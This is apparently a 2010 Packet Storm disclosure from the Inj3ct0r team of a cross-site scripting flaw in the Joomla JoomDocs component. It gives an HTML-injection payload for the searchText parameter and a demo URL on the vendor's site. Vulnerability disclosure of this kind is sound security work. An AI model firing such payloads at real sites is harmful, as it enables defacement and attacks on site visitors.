Joomla Joomdocs Cross Site Scripting

2010-06-19T00:00:00
ID PACKETSTORM:90810
Type packetstorm
Reporter Sid3 effects
Modified 2010-06-19T00:00:00

Description

                                        
                                            ` =======================================  
Joomla com_joomdocs XSS Vulnerability  
=======================================  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ########################################## 1  
0 I'm Sid3^effects member from Inj3ct0r Team 1  
1 ########################################## 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
Name : com_joomdocs XSS Vulnerability  
Date : june, 18 2010  
Vendor url :http://joomclan.com/index.php/JoomDocs/  
Critical Level : MEDIUM   
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>  
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_  
greetz to :All ICW members and my friends :) luv y0 guyz   
#######################################################################################################  
DESCRIPTION:  
JoomDocs is an extensive and powerful Joomla component. JoomDocs allows you to offer instant downloads to your customers with out a lot of effort. You simply click on the scan button in the administrator section downloadable files will instantly show up on your main page with a download link. Administrator Section allows to add unlimited file types, add/scan unlimited categories/sub-categories, add move server hard drives, and more much. JoomDocs is totally configurable.  
  
#######################################################################################################  
com_joomdocs suffers from xss vulnerability  
  
Xploit: XSS Vulnerability   
  
Attack Pattern: ">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>  
  
DEMO URL :http://joomclan.com/joomdocs/index.php?option=com_joomdocs&searchText=[XSS]  
###############################################################################################################  
# 0day no more   
# Sid3^effects   
`